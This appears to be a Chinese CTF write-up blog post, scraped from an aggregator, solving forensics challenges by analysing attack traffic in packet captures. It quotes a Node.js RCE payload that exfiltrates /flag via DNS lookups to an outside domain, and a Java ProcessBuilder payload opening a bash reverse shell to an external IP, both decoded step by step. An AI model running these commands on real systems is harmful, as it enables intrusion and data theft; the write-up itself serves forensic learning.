news 2026/2/11 8:05:56

破阵阁aaa

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
破阵阁aaa

太好了,又水一集

挺难的,不过好在还是有签到题

代码中的秘密

misc

但是靶机

不过是签到:

查看robots.txt 中发现了 clue。 提示网站可能存在 RIPS 扫描器的遗留文件。访问 /rips/ 路径后,利用 RIPS 扫描器的功能对服务器 web 根目录(/var/www/)进行扫描,从扫描结果的文件列表中发现了一个异常文件 a6e97102-1f98-4c21-a6e1-26611c53b79b.php。访问,获得 flag。

flag{a6e97102-1f98-4c21-a6e1-26611c53b79b}

静影寻踪

取证

描述:于凝固的数字记忆中,追溯那些悄然消逝的涟漪与未言之约。

咱也不懂:

FLAG 消失之谜

取证(那我问你)

描述:我们刚刚监测到一次针对 Web 服务器的精准攻击——攻击者利用漏洞成功窃取了服务器上的敏感文件FLAG。 幸运的是,我们捕获了攻击期间的完整网络流量,但 FLAG 已被攻击者通过某种方式隐藏并外传。

核心逻辑:Web 漏洞利用 (RCE) -> 数据编码 (Base64) -> 通道外带 (DNS OOB)。

1. 攻击流量发现
首先分析 HTTP 流量,寻找攻击入口。通过搜索 POST 请求或 exec、system 等关键字,定位到第 9780 帧附近的恶意请求。

Payload 分析:
攻击者发送了一个 JSON 数据包,其中利用了 Node.js 的 child_process 模块执行系统命令。

process.mainModule.require("child_process").execSync("cat /flag | base64 | tr -d '=' | tr -d '\\n' | xargs -I {} ping -c 1 {}.c07545bc.digimg.store")


行为判定:这是一次利用 Node.js 环境进行的远程代码执行(RCE),并利用 DNS 协议进行数据外带。
2. 数据提取 (DNS Exfiltration)
攻击者将 /flag 的内容进行了 Base64 编码,并移除了填充符 = 和换行符,然后将其拼接到 digimg.store 的子域名中进行 ping 操作。这会导致受害服务器向 DNS 服务器发送查询请求。

过滤 DNS:
在 Wireshark 中使用过滤器 dns 或直接搜索域名 digimg.store。
提取数据:
找到 DNS Query Name 字段,提取主机名前缀:
ZmxhZ3tiOGVmYjJjYS02M2U4LTRkYjYtYWVhNS02YzZkMzRmMDM3NTR
3. Flag 还原
对提取的字符串进行 Base64 解码:

Base64: ZmxhZ3tiOGVmYjJjYS02M2U4LTRkYjYtYWVhNS02YzZkMzRmMDM3NTR
ASCII: flag{b8efb2ca-63e8-4db6-aea5-6c6d34f03754
由于 Base64 编码在传输过程中可能丢失了最后的 fQ== (即 }) 部分(或者被截断),根据 UUID 的标准格式(8-4-4-4-12)验证,Guid 部分 b8efb2ca-63e8-4db6-aea5-6c6d34f03754 是完整的。因此,只需补上最后的 }。

一发入魂

取证。懒得搞了,反正也没奖

描述:这位黑客老哥属实是个讲究人,全程只发一个 HTTP 包,深藏功与名。快来围观这“一发入魂”的骚操作,顺便把 FLAG 领走

flag{4ba8aa22-6703-4107-9a68-9f3c92cccd24}

1. 初步分析

拿到流量包,题目提示“黑客全程只发一个 HTTP 包”,这暗示我们可以通过过滤 HTTP POST 请求来快速定位攻击入口。

在 Wireshark 中使用过滤器:

http.request.method == "POST"

2. 发现攻击流量

筛选后,发现唯一的 POST 请求是发往/ScriptEngine/scriptEngineEval.do的。这是一个典型的命令执行漏洞利用特征。

查看该数据包的实体内容(URL解码后):

var pb = new java.lang.ProcessBuilder("bash", "-c", "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny43Ni4xODIuMTk1LzUzNTMgMD4mMQ==}|{base64,-d}|{bash,-i}"); pb.redirectErrorStream(true); var p = pb.start(); ...

这段 Payload 利用 Java 的ProcessBuilder执行了一段 Base64 编码的 shell 命令。

3. 解码攻击载荷

提取其中的 Base64 字符串YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny43Ni4xODIuMTk1LzUzNTMgMD4mMQ==进行解码,内容为:

bash -i >& /dev/tcp/47.76.182.195/5353 0>&1

这证实攻击者成功向47.76.182.195:5353建立了一个反弹 Shell。

4. 追踪 TCP 流

既然攻击者已经拿到了 Shell,后续的读取 Flag 操作肯定是在这个反弹连接(TCP流)中进行的。

在 Wireshark 中:

  1. 找到目标端口为5353的数据包。
  2. 右键点击相关条目 ->Follow->TCP Stream

在 TCP 流的数据中(通常在流的末尾),可以看到攻击者执行了如下命令:

echo "aGV4ZHVtcCAtdmUgJzEvMSAiJS4yeCInIC9mbGFn" | base64 -d | bash

将这段 Base64 解码,发现攻击者执行的是:

hexdump -ve '1/1 "%.2x"' /flag

这意味着/flag文件的内容被转换成了十六进制纯文本进行回显。

5. 获取 FLAG

在 TCP 流的响应中,找到对应的十六进制输出:
666c61677b34626138616132322d363730332d343130372d396136382d3966336339326363636432347d

将其从 Hex 转换为 ASCII 字符串:

flag{4ba8aa22-6703-4107-9a68-9f3c92cccd24}

咕咕嘎嘎!呃~

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/9 7:57:55

细胞多尺度仿真软件:CellSys_(10).模型验证与优化

模型验证与优化 模型验证的重要性 在细胞多尺度仿真软件(CellSys)的开发和应用过程中,模型验证是一个至关重要的步骤。模型验证的目的是确保仿真模型能够准确地反映生物系统的实际行为,从而提高仿真的可靠性和准确性。验证过程通…

作者头像 李华
网站建设 2026/2/9 7:01:42

【小程序毕设源码分享】基于springboot+Android的成人教育APP的设计与实现(程序+文档+代码讲解+一条龙定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华
网站建设 2026/2/9 8:03:25

Qt 帮助文档为空问题(查询无结果)

遇到这种问题通常为帮助文档安装不齐全,或安装损坏等,网上有很多去找到那个修复工具修复Qt,但是在Mac里面就非常难找(我就没找到)所以整理了一个100%有效,无门槛的方法。Qt 查找但是我第一次在上面输入时就…

作者头像 李华
网站建设 2026/2/9 7:01:50

豆包生成带复杂公式的文件如何导出到Word文档

你是否也曾为这样的场景头疼:在豆包 AI 里生成了一份内容详实、公式工整、表格清晰的技术文档或学术回答,满心欢喜地复制到 Word 里准备整理提交时,却发现所有漂亮的公式都变成了一堆无法辨识的乱码,格式也彻底崩塌? …

作者头像 李华
网站建设 2026/2/9 7:09:55

WGD分类进阶--随笔021

基于全基因组复制(WGD)的 KEGG 功能富集及 Ka/Ks 进化分析 01 分析背景与核心目标 本分析聚焦基因复制事件中全基因组复制(WGD) 类型,结合 KEGG 功能富集分析解析 WGD 基因的生物学功能特征,通过 Ka/Ks&a…

作者头像 李华